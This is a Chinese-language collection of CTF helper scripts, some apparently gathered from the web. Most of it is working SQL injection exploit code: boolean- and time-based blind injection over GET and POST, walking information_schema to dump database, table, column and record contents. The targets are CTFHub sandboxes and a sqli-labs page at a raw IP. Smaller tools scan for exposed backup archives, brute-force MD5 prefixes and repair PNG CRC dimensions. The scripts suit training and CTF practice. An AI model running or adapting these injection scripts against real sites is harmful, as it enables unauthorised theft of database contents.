POST盲注(暴力)
from requests import *
import time
url = ''
payload = {"id" : ""}
flag = ""
for i in range(1,10000000000):#flag长度
time.sleep(0.06)
for j in range(20, 126):#可见字符ascii范围
payload["id"] = "if((ascii(substr((select(flag)from(flag)),{0},1))={1}),1,0)".format(i, j)
now = post(url, payload)
time.sleep(0.04)
if "Hello" in now.text:#Hello改为回显信息
print(i)
flag += chr(j)
print(flag)
break
POST盲注(二分)
from requests import *
import time
url = ""
payload = {"id" : ""}
flag = ""
for i in range(1,200):#这里调多大都不会有影响,应为判断结束的条件是用空格判断的
time.sleep(0.06)
l = 20; r = 126; mid = (l + r) // 2
while(l < r):
payload["id"] = "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i,mid)
res = post(url,payload)
time.sleep(0.04)
# print(payload)
if "Hello" in res.text:l = mid + 1#Hello改为回显信息
else:r = mid
mid = (l + r) // 2
if(chr(mid) == " "):break
flag += chr(mid)
print(flag)
print("flag: " ,flag)
MD5碰撞
import requests
import base64
import sys
import hashlib
def getMd5(index):
for i in range(100000,100000000):
x = i
md5 = hashlib.md5(str(x).encode("utf8")).hexdigest()
if md5[0:6] == index:
return x
a = input() # 需要碰撞的md5
print(getMd5(a))
CRC修复
import zlib
import struct
import argparse
import itertools
parser = argparse.ArgumentParser()
parser.add_argument("-f", type=str, default=None, required=True,
help="输入同级目录下图片的名称")
args = parser.parse_args()
bin_data = open(args.f, 'rb').read()
crc32key = zlib.crc32(bin_data[12:29]) # 计算crc
original_crc32 = int(bin_data[29:33].hex(), 16) # 原始crc
if crc32key == original_crc32: # 计算crc对比原始crc
print('宽高没有问题!')
else:
input_ = input("宽高被改了, 是否CRC爆破宽高? (Y/n):")
if input_ not in ["Y", "y", ""]:
exit()
else:
for i, j in itertools.product(range(4095), range(4095)): # 理论上0x FF FF FF FF,但考虑到屏幕实际/cpu,0x 0F FF就差不多了,也就是4095宽度和高度
data = bin_data[12:16] + struct.pack('>i', i) + struct.pack('>i', j) + bin_data[24:29]
crc32 = zlib.crc32(data)
if(crc32 == original_crc32): # 计算当图片大小为i:j时的CRC校验值,与图片中的CRC比较,当相同,则图片大小已经确定
print(f"\nCRC32: {hex(original_crc32)}")
print(f"宽度: {i}, hex: {hex(i)}")
print(f"高度: {j}, hex: {hex(j)}")
exit(0)
Web敏感目录扫描
import requests
import time
print("网址:")
url = input()
li1 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp', 'index.php']
li2 = ['tar', 'tar.gz', 'zip', 'rar', 'swp']
for i in li1:
for j in li2:
url_final = url + "/" + i + "." + j
r = requests.get(url_final)
print(i+'.'+j)
print(r)
time.sleep(1)
-----------------------------------以下为网络搜集的脚本,非自己编写
自动化布尔盲注(GET)
import requests
from urllib.parse import quote
success_flag = "query_success" #成功查询到内容的关键字
base_url = "http://challenge-af51e573b0753c56.sandbox.ctfhub.com:10800/?id="
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
def get_database_length():
global success_flag, base_url, headers, cookies
length = 1
while (1):
id = "1 and length(database()) = " + str(length)
url = base_url + quote(id) #很重要,因为id中有许多特殊字符,比如#,需要进行url编码
response = requests.get(url, headers=headers).text
if (success_flag not in response):
print("database length", length, "failed!")
length+=1
else:
print("database length", length, "success")
print("payload:", id)
break
print("数据库名的长度为", length)
return length
def get_database(database_length):
global success_flag, base_url, headers, cookies
database = ""
for i in range(1, database_length + 1):
l, r = 0, 127 #神奇的申明方法
while (1):
ascii = (l + r) // 2
id_equal = "1 and ascii(substr(database(), " + str(i) + ", 1)) = " + str(ascii)
response = requests.get(base_url + quote(id_equal), headers=headers).text
if (success_flag in response):
database += chr(ascii)
print ("目前已知数据库名", database)
break
else:
id_bigger = "1 and ascii(substr(database(), " + str(i) + ", 1)) > " + str(ascii)
response = requests.get(base_url + quote(id_bigger), headers=headers).text
if (success_flag in response):
l = ascii + 1
else:
r = ascii - 1
print("数据库名为", database)
return database
def get_table_num(database):
global success_flag, base_url, headers, cookies
num = 1
while (1):
id = "1 and (select count(table_name) from information_schema.tables where table_schema = '" + database + "') = " + str(num)
response = requests.get(base_url + quote(id), headers=headers).text
if (success_flag in response):
print("payload:", id)
print("数据库中有", num, "个表")
break
else:
num += 1
return num
def get_table_length(index, database):
global success_flag, base_url, headers, cookies
length = 1
while (1):
id = "1 and (select length(table_name) from information_schema.tables where table_schema = '" + database + "' limit " + str(index) + ", 1) = " + str(length)
response = requests.get(base_url + quote(id), headers=headers).text
if (success_flag not in response):
print("table length", length, "failed!")
length+=1
else:
print("table length", length, "success")
print("payload:", id)
break
print("数据表名的长度为", length)
return length
def get_table(index, table_length, database):
global success_flag, base_url, headers, cookies
table = ""
for i in range(1, table_length + 1):
l, r = 0, 127 #神奇的申明方法
while (1):
ascii = (l + r) // 2
id_equal = "1 and (select ascii(substr(table_name, " + str(i) + ", 1)) from information_schema.tables where table_schema = '" + database + "' limit " + str(index) + ",1) = " + str(ascii)
response = requests.get(base_url + quote(id_equal), headers=headers).text
if (success_flag in response):
table += chr(ascii)
print ("目前已知数据库名", table)
break
else:
id_bigger = "1 and (select ascii(substr(table_name, " + str(i) + ", 1)) from information_schema.tables where table_schema = '" + database + "' limit " + str(index) + ",1) > " + str(ascii)
response = requests.get(base_url + quote(id_bigger), headers=headers).text
if (success_flag in response):
l = ascii + 1
else:
r = ascii - 1
print("数据表名为", table)
return table
def get_column_num(table):
global success_flag, base_url, headers, cookies
num = 1
while (1):
id = "1 and (select count(column_name) from information_schema.columns where table_name = '" + table + "') = " + str(num)
response = requests.get(base_url + quote(id), headers=headers).text
if (success_flag in response):
print("payload:", id)
print("数据表", table, "中有", num, "个字段")
break
else:
num += 1
return num
def get_column_length(index, table):
global success_flag, base_url, headers, cookies
length = 1
while (1):
id = "1 and (select length(column_name) from information_schema.columns where table_name = '" + table + "' limit " + str(index) + ", 1) = " + str(length)
response = requests.get(base_url + quote(id), headers=headers).text
if (success_flag not in response):
print("column length", length, "failed!")
length+=1
else:
print("column length", length, "success")
print("payload:", id)
break
print("数据表", table, "第", index, "个字段的长度为", length)
return length
def get_column(index, column_length, table):
global success_flag, base_url, headers, cookies
column = ""
for i in range(1, column_length + 1):
l, r = 0, 127 #神奇的申明方法
while (1):
ascii = (l + r) // 2
id_equal = "1 and (select ascii(substr(column_name, " + str(i) + ", 1)) from information_schema.columns where table_name = '" + table + "' limit " + str(index) + ",1) = " + str(ascii)
response = requests.get(base_url + quote(id_equal), headers=headers).text
if (success_flag in response):
column += chr(ascii)
print ("目前已知字段为", column)
break
else:
id_bigger = "1 and (select ascii(substr(column_name, " + str(i) + ", 1)) from information_schema.columns where table_name = '" + table + "' limit " + str(index) + ",1) > " + str(ascii)
response = requests.get(base_url + quote(id_bigger), headers=headers).text
if (success_flag in response):
l = ascii + 1
else:
r = ascii - 1
print("数据表", table, "第", index, "个字段名为", column)
return column
def get_flag_num(column, table):
global success_flag, base_url, headers, cookies
num = 1
while (1):
id = "1 and (select count(" + column + ") from " + table + ") = " + str(num)
response = requests.get(base_url + quote(id), headers=headers).text
if (success_flag in response):
print("payload:", id)
print("数据表", table, "中有", num, "行数据")
break
else:
num += 1
return num
def get_flag_length(index, column, table):
global success_flag, base_url, headers, cookies
length = 1
while (1):
id = "1 and (select length(" + column + ") from " + table + " limit " + str(index) + ", 1) = " + str(length)
response = requests.get(base_url + quote(id), headers=headers).text
if (success_flag not in response):
print("flag length", length, "failed!")
length+=1
else:
print("flag length", length, "success")
print("payload:", id)
break
print("数据表", table, "第", index, "行数据的长度为", length)
return length
def get_flag(index, flag_length, column, table):
global success_flag, base_url, headers, cookies
flag = ""
for i in range(1, flag_length + 1):
l, r = 0, 127 #神奇的申明方法
while (1):
ascii = (l + r) // 2
id_equal = "1 and (select ascii(substr(" + column + ", " + str(i) + ", 1)) from " + table + " limit " + str(index) + ",1) = " + str(ascii)
response = requests.get(base_url + quote(id_equal), headers=headers).text
if (success_flag in response):
flag += chr(ascii)
print ("目前已知flag为", flag)
break
else:
id_bigger = "1 and (select ascii(substr(" + column + ", " + str(i) + ", 1)) from " + table + " limit " + str(index) + ",1) > " + str(ascii)
response = requests.get(base_url + quote(id_bigger), headers=headers).text
if (success_flag in response):
l = ascii + 1
else:
r = ascii - 1
print("数据表", table, "第", index, "行数据为", flag)
return flag
if __name__ == "__main__":
print("---------------------")
print("开始获取数据库名长度")
database_length = get_database_length()
print("---------------------")
print("开始获取数据库名")
database = get_database(database_length)
print("---------------------")
print("开始获取数据表的个数")
table_num = get_table_num(database)
tables = []
print("---------------------")
for i in range(0, table_num):
print("开始获取第", i + 1, "个数据表的名称的长度")
table_length = get_table_length(i, database)
print("---------------------")
print("开始获取第", i + 1, "个数据表的名称")
table = get_table(i, table_length, database)
tables.append(table)
while(1): #在这个循环中可以进入所有的数据表一探究竟
print("---------------------")
print("现在得到了以下数据表", tables)
table = input("请在这些数据表中选择一个目标: ")
while( table not in tables ):
print("你输入有误")
table = input("请重新选择一个目标")
print("---------------------")
print("选择成功,开始获取数据表", table, "的字段数量")
column_num = get_column_num(table)
columns = []
print("---------------------")
for i in range(0, column_num):
print("开始获取数据表", table, "第", i + 1, "个字段名称的长度")
column_length = get_column_length(i, table)
print("---------------------")
print("开始获取数据表", table, "第", i + 1, "个字段的名称")
column = get_column(i, column_length, table)
columns.append(column)
while(1): #在这个循环中可以获取当前选择数据表的所有字段记录
print("---------------------")
print("现在得到了数据表", table, "中的以下字段", columns)
column = input("请在这些字段中选择一个目标: ")
while( column not in columns ):
print("你输入有误")
column = input("请重新选择一个目标")
print("---------------------")
print("选择成功,开始获取数据表", table, "的记录数量")
flag_num = get_flag_num(column, table)
flags = []
print("---------------------")
for i in range(0, flag_num):
print("开始获取数据表", table, "的", column, "字段的第", i + 1, "行记录的长度")
flag_length = get_flag_length(i, column, table)
print("---------------------")
print("开始获取数据表", table, "的", column, "字段的第", i + 1, "行记录的内容")
flag = get_flag(i, flag_length, column, table)
flags.append(flag)
print("---------------------")
print("现在得到了数据表", table, "中", column, "字段中的以下记录", flags)
quit = input("继续切换字段吗?(y/n)")
if (quit == 'n' or quit == 'N'):
break
else:
continue
quit = input("继续切换数据表名吗?(y/n)")
if (quit == 'n' or quit == 'N'):
break
else:
continue
print("bye~")
自动化时间盲注(GET)
import requests
from urllib.parse import quote
base_url = "http://challenge-af51e573b0753c56.sandbox.ctfhub.com:10800/?id="
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Referer": "http://challenge-59668c27594f7541.sandbox.ctfhub.com:10800/", "Upgrade-Insecure-Requests": "1"}
def get_database_length():
global base_url, headers
length = 1
while (1):
id = "1 and if(length(database()) = " + str(length) + ", 1, sleep(2))"
url = base_url + quote(id) #很重要,因为id中有许多特殊字符,比如#,需要进行url编码
try:
requests.get(url, headers=headers, timeout=1).text
except Exception:
print("database length", length, "failed!")
length+=1
else:
print("database length", length, "success")
print("payload:", id)
break
print("数据库名的长度为", length)
return length
def get_database(database_length):
global base_url, headers
database = ""
for i in range(1, database_length + 1):
l, r = 0, 127 #神奇的申明方法
while (1):
ascii = (l + r) // 2
id_equal = "1 and if(ascii(substr(database(), " + str(i) + ", 1)) = " + str(ascii) + ", 1, sleep(2))"
try:
requests.get(base_url + quote(id_equal), headers=headers, timeout=1).text
except Exception:
id_bigger = "1 and if(ascii(substr(database(), " + str(i) + ", 1)) > " + str(ascii) + ", 1, sleep(2))"
try:
requests.get(base_url + quote(id_bigger), headers=headers, timeout=1).text
except Exception:
r = ascii - 1
else:
l = ascii + 1
else:
database += chr(ascii)
print ("目前已知数据库名", database)
break
print("数据库名为", database)
return database
def get_table_num(database):
global base_url, headers
num = 1
while (1):
id = "1 and if((select count(table_name) from information_schema.tables where table_schema = '" + database + "') = " + str(num) + ", 1, sleep(2))"
try:
requests.get(base_url + quote(id), headers=headers, timeout=1).text
except Exception:
num += 1
else:
print("payload:", id)
print("数据库中有", num, "个表")
break
return num
def get_table_length(index, database):
global base_url, headers
length = 1
while (1):
id = "1 and if((select length(table_name) from information_schema.tables where table_schema = '" + database + "' limit " + str(index) + ", 1) = " + str(length) + ", 1, sleep(2))"
try:
requests.get(base_url + quote(id), headers=headers, timeout= 1).text
except Exception:
print("table length", length, "failed!")
length+=1
else:
print("table length", length, "success")
print("payload:", id)
break
print("数据表名的长度为", length)
return length
def get_table(index, table_length, database):
global base_url, headers
table = ""
for i in range(1, table_length + 1):
l, r = 0, 127 #神奇的申明方法
while (1):
ascii = (l + r) // 2
id_equal = "1 and if((select ascii(substr(table_name, " + str(i) + ", 1)) from information_schema.tables where table_schema = '" + database + "' limit " + str(index) + ",1) = " + str(ascii) + ", 1, sleep(2))"
try:
response = requests.get(base_url + quote(id_equal), headers=headers, timeout=1).text
except Exception:
id_bigger = "1 and if((select ascii(substr(table_name, " + str(i) + ", 1)) from information_schema.tables where table_schema = '" + database + "' limit " + str(index) + ",1) > " + str(ascii) + ", 1, sleep(2))"
try:
response = requests.get(base_url + quote(id_bigger), headers=headers, timeout=1).text
except Exception:
r = ascii - 1
else:
l = ascii + 1
else:
table += chr(ascii)
print ("目前已知数据库名", table)
break
print("数据表名为", table)
return table
def get_column_num(table):
global base_url, headers
num = 1
while (1):
id = "1 and if((select count(column_name) from information_schema.columns where table_name = '" + table + "') = " + str(num) + ", 1, sleep(2))"
try:
requests.get(base_url + quote(id), headers=headers, timeout=1).text
except Exception:
num += 1
else:
print("payload:", id)
print("数据表", table, "中有", num, "个字段")
break
return num
def get_column_length(index, table):
global base_url, headers
length = 1
while (1):
id = "1 and if((select length(column_name) from information_schema.columns where table_name = '" + table + "' limit " + str(index) + ", 1) = " + str(length) + ", 1, sleep(2))"
try:
requests.get(base_url + quote(id), headers=headers, timeout=1).text
except Exception:
print("column length", length, "failed!")
length+=1
else:
print("column length", length, "success")
print("payload:", id)
break
print("数据表", table, "第", index, "个字段的长度为", length)
return length
def get_column(index, column_length, table):
global base_url, headers
column = ""
for i in range(1, column_length + 1):
l, r = 0, 127 #神奇的申明方法
while (1):
ascii = (l + r) // 2
id_equal = "1 and if((select ascii(substr(column_name, " + str(i) + ", 1)) from information_schema.columns where table_name = '" + table + "' limit " + str(index) + ",1) = " + str(ascii) + ", 1, sleep(2))"
try:
requests.get(base_url + quote(id_equal), headers=headers, timeout=1).text
except Exception:
id_bigger = "1 and if((select ascii(substr(column_name, " + str(i) + ", 1)) from information_schema.columns where table_name = '" + table + "' limit " + str(index) + ",1) > " + str(ascii) + ", 1, sleep(2))"
try:
requests.get(base_url + quote(id_bigger), headers=headers, timeout=1).text
except Exception:
r = ascii - 1
else:
l = ascii + 1
else:
column += chr(ascii)
print ("目前已知字段为", column)
break
print("数据表", table, "第", index, "个字段名为", column)
return column
def get_flag_num(column, table):
global base_url, headers
num = 1
while (1):
id = "1 and if((select count(" + column + ") from " + table + ") = " + str(num) + ", 1, sleep(2))"
try:
requests.get(base_url + quote(id), headers=headers, timeout=1).text
except Exception:
num += 1
else:
print("payload:", id)
print("数据表", table, "中有", num, "行数据")
break
return num
def get_flag_length(index, column, table):
global base_url, headers
length = 1
while (1):
id = "1 and if((select length(" + column + ") from " + table + " limit " + str(index) + ", 1) = " + str(length) + ", 1, sleep(2))"
try:
requests.get(base_url + quote(id), headers=headers, timeout=1).text
except Exception:
print("flag length", length, "failed!")
length+=1
else:
print("flag length", length, "success")
print("payload:", id)
break
print("数据表", table, "第", index, "行数据的长度为", length)
return length
def get_flag(index, flag_length, column, table):
global base_url, headers
flag = ""
for i in range(1, flag_length + 1):
l, r = 0, 127 #神奇的申明方法
while (1):
ascii = (l + r) // 2
id_equal = "1 and if((select ascii(substr(" + column + ", " + str(i) + ", 1)) from " + table + " limit " + str(index) + ",1) = " + str(ascii) + ", 1, sleep(2))"
try:
requests.get(base_url + quote(id_equal), headers=headers, timeout=1).text
except Exception:
id_bigger = "1 and if((select ascii(substr(" + column + ", " + str(i) + ", 1)) from " + table + " limit " + str(index) + ",1) > " + str(ascii) + ", 1, sleep(2))"
try:
requests.get(base_url + quote(id_bigger), headers=headers, timeout=1).text
except Exception:
r = ascii - 1
else:
l = ascii + 1
else:
flag += chr(ascii)
print ("目前已知flag为", flag)
break
print("数据表", table, "第", index, "行数据为", flag)
return flag
if __name__ == "__main__":
print("---------------------")
print("开始获取数据库名长度")
database_length = get_database_length()
print("---------------------")
print("开始获取数据库名")
database = get_database(database_length)
print("---------------------")
print("开始获取数据表的个数")
table_num = get_table_num(database)
tables = []
print("---------------------")
for i in range(0, table_num):
print("开始获取第", i + 1, "个数据表的名称的长度")
table_length = get_table_length(i, database)
print("---------------------")
print("开始获取第", i + 1, "个数据表的名称")
table = get_table(i, table_length, database)
tables.append(table)
while(1): #在这个循环中可以进入所有的数据表一探究竟
print("---------------------")
print("现在得到了以下数据表", tables)
table = input("请在这些数据表中选择一个目标: ")
while( table not in tables ):
print("你输入有误")
table = input("请重新选择一个目标")
print("---------------------")
print("选择成功,开始获取数据表", table, "的字段数量")
column_num = get_column_num(table)
columns = []
print("---------------------")
for i in range(0, column_num):
print("开始获取数据表", table, "第", i + 1, "个字段名称的长度")
column_length = get_column_length(i, table)
print("---------------------")
print("开始获取数据表", table, "第", i + 1, "个字段的名称")
column = get_column(i, column_length, table)
columns.append(column)
while(1): #在这个循环中可以获取当前选择数据表的所有字段记录
print("---------------------")
print("现在得到了数据表", table, "中的以下字段", columns)
column = input("请在这些字段中选择一个目标: ")
while( column not in columns ):
print("你输入有误")
column = input("请重新选择一个目标")
print("---------------------")
print("选择成功,开始获取数据表", table, "的记录数量")
flag_num = get_flag_num(column, table)
flags = []
print("---------------------")
for i in range(0, flag_num):
print("开始获取数据表", table, "的", column, "字段的第", i + 1, "行记录的长度")
flag_length = get_flag_length(i, column, table)
print("---------------------")
print("开始获取数据表", table, "的", column, "字段的第", i + 1, "行记录的内容")
flag = get_flag(i, flag_length, column, table)
flags.append(flag)
print("---------------------")
print("现在得到了数据表", table, "中", column, "字段中的以下记录", flags)
quit = input("继续切换字段吗?(y/n)")
if (quit == 'n' or quit == 'N'):
break
else:
continue
quit = input("继续切换数据表名吗?(y/n)")
if (quit == 'n' or quit == 'N'):
break
else:
continue
print("bye~")
布尔盲注(POST)
import requests
chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz_,-.@&%/^!~"
result = ""
def get_length(value): #获取要查询的数据的长度
for n in range(1,100):
payload = "admin' and length(({0})) ={1} #".format(data_payload,n)
data = {"uname":payload,"passwd":"admin"}
html = requests.post(url,data=data)
length = len(html.text)
if length >value:
print("……data length is :" + str(n))
return n
def get_data(data_length,value): #获取数据
global result
for i in range(1,data_length):
for char in chars:
payload = "admin'and ascii(substr(({0}),{1},1))={2} #".format(data_payload,i,ord(char))
data = {"uname":payload,"passwd":"admin"}
html = requests.post(url,data=data)
length = len(html.text)
if length>value: #根据返回长度的不同来判断字符正确与否
result += char
print("…… data is :"+ result)
break
url = "http://43.247.91.228:84/Less-15/"
data_payload = "select group_concat(table_name)from information_schema.tables where table_schema = database()"
value = 1460 # 根据正确访问和错误访问时返回页面文本长度的不同 来设置一个判断值,这个值需要在浏览器中 按f12 查看
length = get_length(value) +1
get_data(length,value)
print(result)
时间盲注(POST)
import requests
import time
value ="0123456789abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ%&^@_.-!"
result=""
def get_length():#获取数据的长度
for n in range(1, 100):
payload = "admin' and if((length(({0} ))={1}),sleep(4),1) #".format(data_payload, n)
data = {"uname": payload, "passwd": "admin", "submit": "submit"}
start_time = time.time()
html = requests.post(url, data=data)
end_time = time.time()
use_time = end_time - start_time #求出请求前后的时间差来判断是否延时了
if use_time > 3:
print("...... data's length is :"+ str(n))
return n
def get_data(length):#获取数据
global result
for n in range(1,length):
for v in value:
payload = "admin' and if((ascii(substr(({0} ),{1},1)) = '{2}'),sleep(5),1) #".format(data_payload,n,ord(v))
data = {"uname":payload,"passwd":"admin","submit":"submit"}
start_time = time.time()
requests.post(url,data=data)
end_time = time.time()
use_time = end_time - start_time
# 为啥把sleep时间设这么长呢?原因是我这里时常会出现网络波动,有时候请求时间就有2秒多,为避免出现乱码,所以设长一点可以保证信息的准确性
if use_time >4:
result += v
print("......"+result)
url = "http://43.247.91.228:84/Less-15/"
data_payload ="select group_concat(table_name,0x7e)from information_schema.tables where table_schema=database()"
length = get_length() + 1 #注意这里要长度加 1 因为 range(1,10)的范围是 1<= x <10
get_data(length)
print(".....data is :"+ result)
